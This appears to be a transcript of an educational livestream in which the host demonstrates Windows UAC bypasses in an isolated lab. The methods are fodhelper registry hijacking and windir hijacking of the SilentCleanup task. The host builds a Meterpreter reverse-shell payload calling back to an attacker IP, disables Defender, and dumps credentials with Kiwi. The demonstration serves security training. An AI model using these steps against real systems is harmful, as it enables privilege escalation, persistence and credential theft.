delegate execute property to the key, followed by a custom value to execute. Okay, so let's give this a shot. And the way we're going to do this is we've got a Kali box, right? So let's use it to our advantage. I have to like restart the machine to make all that work, I think. But, over here, we're going to fire up the MSF console. And then over here, we're going to go to scripts. And we're going to make a dir called payloads. I'm going to split my window just because I can. And we're going to use MSF Venom. The payload is, of course, going to be Windows, x64, interpreter, reverse TCP, right? And we'll turn off Defender in a second. The format is going to be exe. The output is going to be mt.exe. lhost is going to be 10.1.99.103. That is my IP address in that isolation network. God, I love this lab. And the L port is going to be my favorite quad 8s. I just use that for testing. And I think we're good. Beautiful. Over here, let me rename this to MSF. Okay, we're going to use exploit multi-handler. Set the payload to Windows x64, interpreter, reverse TCP, set lhost 10.1.99.103, set lport 8888, run J. We are now running a listener on our IP address on the quad 8s, waiting for a callback from that interpreter agent. How are we going to get it over there? Why? Simple. But first we got to turn off Defender. Otherwise, this will be real fast. Off, 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 off. I don't want no stinking Defender here. Because remember, the point is we're talking about privilege escalation, not EDR evasion at the moment. Wait, seriously? Is there going to be a butthead about this? Well, fine. Okay, I can't do copy and paste over RDP. I don't know why, but whatever. That's right, I installed Windows Terminal. Cool. So, easy days. Payloads, CD payloads. We just fire up a Python HTTP server, and then over here, go grab this wget 10.1.99.103 8000 / mt.exe. Oh, come on. Yeah, but I don't want to have to deal with it, Husky, so don't use recommended settings. That solves it. Okay, phenomenal. So obviously, if we were to kick this thing off right now, we would get a interpreter session, but we would get it in a a medium context, or a medium integrity. Medium integrity? Medium integrity. Meaning that I don't have access to that admin token, not in this context. I want a shell with access to that admin token so I can go do stuff, like become system, hit LSAS, do all the usual interpreter evil stuff, right? Now I'm in built-in administrators, but again, I need that high integrity context in order to make all that happen. So that's where FOD helper comes in. Notice that we have this ability here So we're going to add the delegate execute property to HKCU, so the current user hive, software classes, MS settings, shell, open, command. All right. Quick check. Who would like a quick review on the registry and what we're looking at here? If this is if anyone's looking at this and like, I don't understand what this is, let me know, because we'll slow down. You know what? You would? All right, Husky. Okay, so I think people talk about the Windows registry all the time, and if you like, and for me, honestly, I had to do a lot of remedial learning about it, because as a primarily Mac and Linux guy for most of my career, I didn't have to deal with Windows like inside baseball for a long time. Now I do. And here's the deal. In Linux and Mac, configuration items and system configuration is all set up in flat files. Meaning that, like, if I go into the Etsy folder, I've got all these files that, like .conf, I have all these configuration files that are plain text, almost exclusively and by design, that determine the running of the system. And Etsy is not the only folder that has configuration files, but generally that's where they live. Now, that is the design of Unix-like operating systems. That's how they were designed back in the 60s in Bell Labs. Windows is not designed like that. Windows has a database, and it's called the registry. And the data is stored in a binary blob format. So that's number one. It's not plain text readable. You have to dump it out with specific tools if you want to read it. And that's part of, like, when we say we're dumping the SAM or the system hives, that's what we're doing. We're getting that binary information and getting it into a human readable format. The registry is a set of key value pairs that are nested inside of these paths. And the top level paths are known as hives, like beehives. And when you see HKCU, and there are going to be some other ones, and we'll take a look at them. When you see these are the hives that you're in. HKCU refers to the hive key's current user. Hive key is really the term, but they're often shortened to hives. Hive key current user. And then there's a path down to software classes. Let's take a look at it. Hey, Benedit, thank you so much for the follow. We're going to take a look at it with good old regedit, which indeed we will run as administrator. And as you can see, I know this is a little small. Can I change? No. Wait, font. Yes, I can make this bigger. Cool. Love it. That's a little bit more readable for y'all. So here are the hives, or hive keys. Play Danger Zone. You know what? That doesn't translate to the piano super well. There are a few songs that just doesn't work. But I'll do backup for Husky when he gets that going. Making it do a ballad. Okay, no kidding. I am working on a like jokey ballad version of Through the Fire and Flames just because. Okay, but so here are the hives. So HKey classes root, so that would be HKCR, HK current user, HKCU, HKLM, local machine, HKU, and HKCC, HKey current config. Almost all the time, you're going to be in HKCU or HKLM. right? Stuff that applies to the computer writ large or stuff that applies to the user that you're currently working in. By the way, quick aside for the deeper folks, when you get this information in Autopsy or any other like incident response tool that does like an image dump of a disk and it reads in the registry, it does not look like this because HKCU, current user, if you're looking at the whole disk, what the hell is the current user? The way that this hive is actually represented is every user on the computer is represented in the registry via their security ID, their SID. So when you look at the registry from that level, you'll actually see it by their SID, and you have to know what SID you're looking for if you're looking for a specific user's registry keys. But when you're looking at it as a regular user on the system, it appears as HKCU. Little deeper fact for you. Okay, so where are we going? HKCU software classes, MS settings, shell, open, command. There are a bunch of different ways that we can navigate this. But you can, in fact, like paste in paths up here. That super did not work. Software classes, MS settings. Let's see. Software classes, MS settings. But ain't there. So we would have to make it. Right, new key and then new values. So over here keys, over here values. Or sort of key value data is I think the way to think about it. But all right, since it's not there, we're gonna actually run this PowerShell command, which will create it. And of course I can't run this. Maybe I can do it this way. It worked. So software classes, MS settings, software classes. I won't see it yet because I need to refresh. And there's MS settings. There it be. Shell. And the force was going to be like, hey, make this even if the subordinate keys weren't there. So we have made that registry key. We have to make a new item. Set it to delegate value. And the value is empty at the moment. Right, so we're just creating a new property. You'll see this in a second. We'll run that again. Or run this command. So we're creating a new item property. New item, item property. Item, item property. Get it? If you regularly made changes to the registry, this would probably seem a bit easier. I do it sometimes, but I hate it. Yeah, I don't love it either. I'll tell you what, I have to tell people how to make changes to the registry fairly frequently, and here's why. Often, vulnerability managers like Nexpose or Nessus will trigger alerts or findings based on registry values. And here's a dirty little secret. Not all of Microsoft's updates update the registry values appropriately to indicate that a vulnerability has been remediated. So sometimes our beleaguered administrators will have to go in and change one of those registry values to get rid of false positives, where they actually have patched the system, but the old registry key is still kicking around and making it look like they haven't. We should do comm hijack hunting one of these Attack on Tuesdays. I like that idea. All right, so let's do new item property. So that has set. Let's refresh this. Command, delegate, execute, and notice Let's kind of move these around so we can see both of these at the same time. Snap to here and here. They also had to write PowerShell scripts for sysadmins to complete patches at my old place all the time after vuln scans. Yup, the struggle is real. You'd think they would. Oh, Bandedit just using the magic word, just. List the installed patches via WMIC. Bandedit, let me tell you about how risk assessment and compliance actually works. If the vulnerability management team cannot produce a legitimate clean report from the blessed vulnerability scanner, you are not going to pass your risk assessment or your vulnerability assessment or whatever your procedure is. You cannot fudge it, which is why you have to go in and do this the hard way. Screenshots do not count as proof. The scanner is using a reliable source. The problem is not the scanner. Most of the time. Sometimes there are mistakes in the way that they write tests, but more often than not, the problem is that a rushed patch from Microsoft didn't appropriately change a registry key. That is the core of the problem. So as you can see, we have this delegate execute item property here, and there's no value set for it. Now, of course, we can use the PowerShell command here, set item property path to a value, which is, we'll set it to custom, whatever it is. And in fact, we will be setting it to our interpreter dropper. But we could also do it via the registry editor here. So our value is going to be C users seclab. And where did I put that thing? Downloads, I think, right? Did I put it on the desktop? Did I? Oh no, did I just put it in the home folder? If so, let's fix that. Uh-oh. There's some difference with the behavior of wget as the alias. Yeah, there it is. Whatever. Okay, so our value here is going to be C users seclab downloads mt.exe. Run F5 on here, and as you can see, it is set. And of course, as Joe's showing us, we could do that. So executing FOD helper will execute the command stored in registry and execute the commands used. Let's find out. Let's go check our Metasploit console. Would you look at that? Now, again, did I get that all-important token? I sure did. Notice that I'm in a high integrity context, which means from here, right, I can do all the fun stuff. Now I have system. Kiwi. Press all the good stuff. Oh, hey, look. There's SecLab's password in plain text. Okay. That's UAC bypass in a nutshell using the FOD helper. Does this have to be done on a local admin account? Yes. Yes. If it's a domain admin, you're also good because domain admins by default are local admins across the domain. Although they shouldn't be remoting into, like, if you have DA, you're good anyway. But what you need is a user account that has admin privs on the machine that you're compromising, right? So even if it's not a local account, it has to be a domain account that has administrator privileges on that machine. Because again, it has to have access to that administrator token. All right. I'm going to shut this down. Because obviously we know that works. Cool. So that's how UAC bypass works. Let's try maybe another one. And we're going to unset all of this because obviously we don't need this anymore. We'll clean this up. And I did snapshot the whole VM before we got started because that's how labs are supposed to work. Okay. Now, there are a couple of other ones that might be fun. But again, so does anyone know of any other UAC bypass techniques that they might want to try? The UAC Me repo has so many in here. They're really, really interesting. Right? Like the token impersonation or DLL hijacking. There's a task manager token steal as well. Yes, I think that's right. Whoa. Weird. Don't know why that just happened. This is the one that I was looking at, was the environment variable expansion. This is kind of cool. Did I save this? I did. Exploiting environment variables and schedule tasks for UAC bypass. So this is cool. I really want to try this one. We might not get to UAC Me tonight, which is fine. But so the Windows test scheduler is a great place, and here I have a link. Task scheduler is a great place to go and find privilege escalations. So let's start with what they're asking here. Look at the scheduled task, and they're looking at the principal for each scheduled task. That's a lot of Windows stuff. So let's start at the basics, right? What are scheduled tasks? Scheduled tasks are one of my favorite things because, well, let's take a look at them. We'll close this up. We'll close up power. We'll minimize PowerShell for the moment. We're going to open up the task scheduler. The task scheduler is how it's, think of it as cron if you're a Linux person, but it is how you schedule stuff on a Windows machine to run periodically. And your Windows machine comes with some stuff that is scheduled by default. Things that you might not think about. Like, I love down at the bottom is there's the, was it not on here? Where's the Xbox Live stuff? That's always on there. It's always fun to see. But obviously, quite a few things that are installed by default. Let me sort by task name. That would help. So we can get at these a couple different ways. Get scheduled task, I think. Well, it's not erroring out. Yep, there it is. And what we can do is we can do select task name. And you see that there is a principle here. So obviously a lot going on here with these different task names. So let's take a look at this exploit and see what it's looking for us to say. We want to look for that run level in particular. Because we want to see highest run level. This is, again, something that's crazy about the task scheduler. Now, I opened it as a regular user, which was a mistake. Let me take a look at it as an administrator. Again, there's that run administrator. UAC is going to do its thing. Or not. Okay. But if we go to create task, and this, of course, we can do via the command line a couple different ways. But if we go to create task, this is the part that I really wanted to show. Run with highest privileges. But it even gets better than that. Run with highest privileges. There's more that you can set up. You can... Oh, yeah, change the user or group. I can actually set this thing not just to run with highest privileges. Oh, no, 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 no. As an administrator, I can set this thing to run a system. I may have set this tasks to run offensive notation in system. Why not? And so we can actually set up an action where we trigger, for example, our interpreter shell, fire that off, and have it run as part of a scheduled task. This is a tried and true persistence mechanism. I don't remember what the MITRE attack number is, but it's definitely on there. Scheduled tasks are wonderful for this. They're also a known mechanism, so if I'm doing incident response, scheduled tasks are like one of the first things I look for, but still something to know about. And again, one of the things that's wild about scheduled tasks is even though they sound like a persistence method, they are also, because of this bananas mechanism where you get to choose what user you run as, or even if you don't choose that, run with the highest privileges available to that user. They are not just persistence, but privilege escalation. They count as both. Okay. So back to this UAC bypass. So we're looking for things that have a run level of highest, and in particular, this is the part that is kind of cool. We are looking for things that have in the execute action in the actions, execute that has a, see these percent signs? These are environment variables in Windows. And here's the thing about these environment variables. Even if you don't have elevated permissions, you can set them yourself. So I can point Winder to any place on the system that I want that I have control over. I could set Winder to my downloads folder if I wanted, and then create a System32 folder. Curious if those settings can be altered within the registry. Ding, ding, ding. Indeed, they can be. Reg add HKCU, environment, value, Winder, data. So this is actually setting it up to use a command to delete Winder and then run your silent cleanup. So what we need to do is on our system, we need to find something, first of all, that has a run level of highest. And it has the ability for us to change it. So group ID users. So we're looking for was that how was that nested? That was part of the top level data. And oh no, task.principal. So it was part of the principal. So you, principal, expand property to see the whole thing. Well, let's just see what the principal has to say here. Let's save the tasks. You know what? Stop making that query and just save it. Okay. So tasks 0. Select principal. Just says MSC. Or no, not select get member, get member. Get member will give us all the properties on this thing. Oh, if I do it that way. Dot principal. That's how we do it. annoying. Let's try it this way. Principal dot run level EQ highest. And welcome to PowerShell. Principal dot group ID. It's group ID, right? Equals users. Look at that. So, turns out silent cleanup was in there, but we wanted to do it the right way to find it rather than jump right to it. So it turns out that we have this thing called disk cleanup that runs with the highest level. Now, we're gonna get schedule task silent cleanup. There it be. Now we're going to save that. And then same thing, task dot actions, the first one. Deliciously, the Winder environment variable is still there. That's really cool. So now we get to use the same process. Let me just go ahead and get my Meterpreter listener up and running again. Cool. Back over to Windows. So what we're going to do is we're going to use the registry to set that Winder environment variable. This is kind of a tricky way to do it. We're going to set the Winder environment variable. A lot of ways to do this. Windows set environment variables. You can do this the hard way. I like doing it via PowerShell. Right, so if we do, let's go take a look at env. No? Ah, man. Come on. Ah. That's the way to do it. Hey, the Guar, it is. So I want to see if there's a system environment.get environment variable. Winder. Oh my god. So here's what we're going to do. We're going to make dir called system32. Okay. What is the context of persistently in this case? I'm pretty sure it's set in the registry. So what we're doing with PowerShell is what the article is doing via a crazy registry hack. Here. where they're doing HKCU environment. And in fact, we can look at it in the registry editor. HKCU / environment. If you close PowerShell, it should if it's set this way. Because notice that right now we've got path, temp, and TMP. But if I set Winder, right, that's going to be what overrides whatever the global is. And that's what's happening here. We're setting it to command register delete HKCU environment. So this is kind of interesting. It's setting the Winder environment to delete itself. And then comment out the rest of the line so that nothing else runs, if that makes sense. And probably a good idea that our Winder for other stuff that's going on in Windows isn't set permanently. So this is kind of a cool way to do it. I don't hate that. But we can actually do it with our own PowerShell. So if we do set environment variable, sa, wow, I really thought I was going to see Winder there. Let's take a look at the... It is set correctly. So one wonders, does this work now, even though it's not set in the registry? So if we look for silent cleanup in here, would it kill them to have these alphabetical? You can fire one of these off from PowerShell, right? Yeah, start schedule task. Okay, not crazy. Oh, of course not. Although... Let's delete HKCU. The problem is, where's the exploitation part? Because this is just setting the environment variable. I think I know what I want to do, which is I'm going to do this a slightly different way. So instead of doing it that way, we're going to set Winder to C users seclab downloads, right? And we're going to set that properly, just like we had System 32. And we're going to cp mt.exe to system32.exe. This is where it gets interesting. We're going to change it to clean mgr.exe. Okay, so is it clear what we're doing here? If we look at this, C users seclab downloads system32 clean mgr.exe, I'm now setting up my environment variable to be Winder to be that downloads folder, right? So, the system cannot find the file specified. Winder / system32. Do we have to set it via the registry? Maybe we do. So it's going to be Winder, right? And we set it to you may need to create the var manually before it can be edited. It's a fair point, although I should have gotten an error message back, John, from that. That's a good point, though. With it here, now let's try the system. We'll try the PowerShell version of this. See if this does anything differently. No, it's not in the registry. It's setting it someplace else, which is fine. But again, we want to set this to C Windows system. Nope, C users seclab downloads. Yeah. And now we're going to see can I find the file specified? Under system32 clean mgr.exe. Sure looks right to me. The environment variable in the registry will persist until the user removes it using a program. User environment variables are stored, retrieved. Is that pasted from documentation? Yeah, because I think that's what we were looking at. I think we're close here. I think to get the new registry variable, you need to open the terminal again. Okay, ticker. Let's try that. All right. Let's see if it works with regular data. It does. Oh no, it doesn't. Hold on a second. I mean, that definitely should work, right? System cannot find the file specified. Show hidden tasks. Schedule task name scan software. Task name. That's what I thought maybe the guard, that I wasn't giving it the right. And yet. Because again, do we have it? Quotes, there's no. No, it's there. Microsoft Windows. Disk cleanup. It's like not here somehow. Hold on. Left side, task schedule, folder, break it out. Microsoft. Windows. Disk cleanup. Silent cleanup. The operator or administrators refuse the request. Okay, so we're going to try this again. We're going to set it via the registry. Should be an expandable string value. Maybe that's the problem. It's the wrong data type. I mean, it shouldn't matter, but just in case. Okay. Okay, well that worked. I think it was the task path. If we had done it via the task path, that would have worked. Sessions 2. Shell. Who am I / groups. And we're in the high. Right? So again, we were able to... That was a little bit more annoying than I wanted it to be, but obviously... We can modify environment variables as a straight up user, no special permissions whatsoever. Then we can from there pivot with the scheduled task manager. If we are an administrator, we're trying to elevate our privileges, right? That's the whole point there. Yep, bypassing UAC. Now, some of this stuff catches Defender. I don't think we're gonna have time for a UAC meet tonight. That might be something we come back to because it's a whole lot, honestly. And I have to learn a little bit more about how it works. But I think this was a good, intro into how all this stuff kind of works and understanding what you're up against with UAC. There are a bunch of UAC bypasses. You can look for a bunch of them. Even if you don't compile UAC me, using this as a database, basically, of these methods, and then going to look these up, kind of awesome, right? Because then you can go just search for these just like I did here, and see if you can figure out ways to make that happen. There's COM hijack handler. So, pretty fun. And then yeah, I was gonna say, should we play with the Notion elevate.exe, but I think that's gonna be another one for another night. Now, I have a question for chat. For those of you who have stuck around this long, first of all, thank you so much. I know that these streams can get long, and I appreciate your attention. I appreciate your time, and I appreciate your engagement. Do we like the lab for offensive work? Because I love it for defensive stuff, but I want to make sure that we're cool with it for offensive stuff too. I think this is a really great way to demonstrate this kind of stuff without the noise, basically, of try hack me and hack the box. All right, cool. Love it for both. That's what I want to hear. I'm so glad that it's working out for that. Awesome. Well, look for more of the lab type stuff where we're doing kind of deep dives and research, maybe even, depending on what we're doing on this stream. That's what's up in the future. So thank you so much for hanging out. Tomorrow, of course, we'll be back with programming content. Let's see if there is anybody who is streaming right now. Is InfoSec streams broken? All right, InfoSec streams the hack list is broken. Maybe it's not broken for other people, but I can't get to it. So All right. I know he plays like Apex or something, right? So if you guys want to go, if y'all want to go check that out, have fun. But I'm gonna say goodnight. Again, be back tomorrow, same bat time, same bat channel. So friends, thank you. As always, be good to yourselves, be good to each other. We'll see you next time. Happy hacking, everybody.